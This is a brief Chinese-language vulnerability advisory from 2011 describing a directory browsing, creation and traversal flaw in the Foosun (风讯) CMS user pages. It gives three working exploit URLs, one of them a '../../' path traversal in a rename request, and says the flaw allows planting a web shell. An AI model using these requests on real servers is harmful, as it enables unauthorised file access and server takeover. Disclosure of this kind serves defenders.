风讯浏览目录创建文件漏洞

发布日期：2011-05.10
发布作者：坏人咖啡

漏洞类型：设计错误
漏洞描述：通过测试发现该程序FolderImageList.asp FolderImageList.asp FileManage.asp 几个脚本程序在处理用户提交的恶意路径参数时没有进行控制过滤，导致攻击者可以进行服务器目前查看，创建等操作，恶意攻击者可以利用该缺陷进行脚本木马的创建利用，导致服务器被控制。

详细说明：先注册用户名登录我后执行下边的命令就可以了

1 游览目录文件
http://192.168.1.62/User/CommPages/FolderImageList.asp?CurrPath=/admin/

2 创建一个目录
http://192.168.1.62/User/CommPages/FolderImageList.asp?CurrPath=/123456/

3 修改一个目录名称
http://192.168.1.62/User/FileManage.asp?Type=FolderReName&OldFileName=../../123456&NewFileName=654321

标签分类：